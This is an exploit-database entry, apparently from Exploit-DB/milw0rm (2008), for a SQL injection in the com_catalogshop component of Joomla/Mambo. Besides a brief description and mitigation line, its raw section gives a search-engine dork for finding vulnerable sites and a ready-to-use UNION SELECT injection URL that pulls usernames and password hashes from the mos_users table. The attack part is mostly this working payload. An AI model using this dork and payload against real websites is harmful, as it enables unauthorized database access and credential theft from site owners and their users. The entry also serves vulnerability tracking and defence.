header-logo
Suggest Exploit
vendor:
Joomla
by:
S@BUN
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Joomla
Affected Version From: 1.0 beta 1 ruff n ready
Affected Version To: 1.0 beta 1 ruff n ready
Patch Exists: YES
Related CWE: N/A
CPE: a:joomla:joomla
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Joomla SQL Injection (com_catalogshop)

An attacker can exploit a SQL injection vulnerability in the com_catalogshop component of Joomla! to execute arbitrary SQL commands. The vulnerability is due to insufficient sanitization of user-supplied input to the 'id' parameter of the 'index.php' script when 'func' is set to 'detail'. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL commands to the vulnerable script. Successful exploitation could result in unauthorized access to sensitive information in the back-end database.

Mitigation:

Upgrade to the latest version of Joomla! or apply the patch from the vendor.
Source

Exploit-DB raw data:

#########################################################################
#
# joomla SQL Injection(com_catalogshop)
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/

#########################################################################
#
# DorKs 1 : allinurl: "com_catalogshop"
#
########################################################################
EXPLOIT :

index.php?option=com_catalogshop&Itemid=S@BUN&func=detail&id=-1/**/union/**/select/**/null,null,concat(password),3,4,5,6,7,8,9,10,11,12,concat(username)/**/from/**/mos_users/*


#########################################################################
# S@BUN                 www.hackturkiye.com                     S@BUN
#########################################################################
# S@BUN                      GOOD LUCKY                          S@BUN
#########################################################################

  <name>catalogshop</name>
  <creationDate>18.01.2005</creationDate>
  <author>K.J. Strickland</author>
  <copyright>This component is released under the GNU/GPL License</copyright>
  <authorEmail>postbox@pixelbunyip.com</authorEmail>

  <authorUrl>www.pixelbunyip.com and www.mambomates.com</authorUrl>
  <version>1.0 beta 1 ruff n ready</version>
  <description>Catalogshop is a simple Mambo ecommerce component.</description>

# milw0rm.com [2008-01-31]